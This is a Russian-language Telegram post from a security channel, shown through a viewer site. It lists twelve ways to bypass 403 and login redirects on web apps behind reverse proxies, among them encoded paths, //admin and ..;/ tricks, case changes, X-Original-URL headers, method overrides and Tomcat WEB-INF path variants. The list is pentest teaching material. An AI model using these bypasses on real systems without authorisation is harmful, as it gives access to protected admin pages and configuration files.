TGViewer
Red Fox Security Red Fox Security @redfoxsec · 234 subscribers
Post #12 733
Cобирал ещё тут на основе своего и чужого опыта разные случаи обхода закрытых директорий. Довольно часто приложения находятся за обратными прокси (reverse proxy) или за теми же балансерами нагрузки (load balancers). И в результате их неверной конфигурации можно получать доступ к закрытым страничкам.

Так что когда делаете перебор директорий, стоит обращать внимание на коды вроде 302, 400, 401, 403, 404, если, конечно, таких страничек не большинство.

1. Пробовать добавлять спец символы, например:
/file/image.png%23
Или %3f // ?, %26 // &, %2e // ., %2f // / (слеш), %40 // @. Так же пробовать двойной, тройной URL-encode, # = %23 = %2523 = %252523

2. /path/to/secret 302 на логин
/public/path/to/secret 200
/foo 403 / 404
/foo/bar 200

3. /admin 403
//admin 200
/%2fadmin 200

4. GET /account/secret 302
GET /account/secret.json 200

5. /admin/secret/ 403
/admin/public/ 200
/admin/public/;secret/ 200, доступ к secret

6. /page 403
/page/ 200
/page/%20 200
/page.ext 200 (ext = php, html, json, и другие, перебирать)
/page/?param 200

7. GET /admin 403
GET /page
X-Original-URL: /admin
200
или X-Rewrite-URL: /admin

8. GET /admin 403
ANYTHING /admin 200, перебор других методов, вроде PUT, DELETE, ...
Пробовать комбинировать с заголовком X-HTTP-Method-Override: ANYTHING

9. Редко, но тоже бывает если кривой конфиг:
/index.html 403
/index.html/ 200

10. /admin 403
/aDmiN 200
/aDmiN/ 200
/ADMIN 200

11. Java, Tomcat, j2ee:
/page.jsp?include=..;/..;/secret.txt
/WEB-INF/web.xml 403
/./WEB-INF/web.xml 403
/.//WEB-INF/web.xml 200
/admin/ 302
/admin..;/ 200

12. /wp-admin/install.php 403
/wp-admin/install.php/* 200

Частично на основе:
https://samcurry.net/hacking-starbucks/
https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8/edit#slide=id.g722ec9d5aa_0_0
  • ❤ 1
More from @redfoxsec
  1. Apr 27, 2024Привет! Я проводил множество собесов для админов и пентестеров, менторил несколько человек…
  2. Apr 27, 2024Отличная и полезная инициатива, рекомендую для подготовки и самопроверки. Докину еще PR с…
  3. Apr 21, 2024Давненько не постил, но отчасти из-за того, что не было особо интересных вещей о которых м…
  4. Dec 24, 2023📈 Прокачиваем AutoRepeater с Hackvertor Вот и подходит к концу 2023 год, в последние неде…
  5. Dec 7, 2023⚠️ Небезопасные сканеры безопасности Сегодня речь пойдет про сканеры безопасности. Как нео…
  6. Dec 2, 2023🔻ZeroQlik + DoubleQlik (CVE-2023-41265, CVE-2023-41266, CVE-2023-48365) Довольно интересн…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →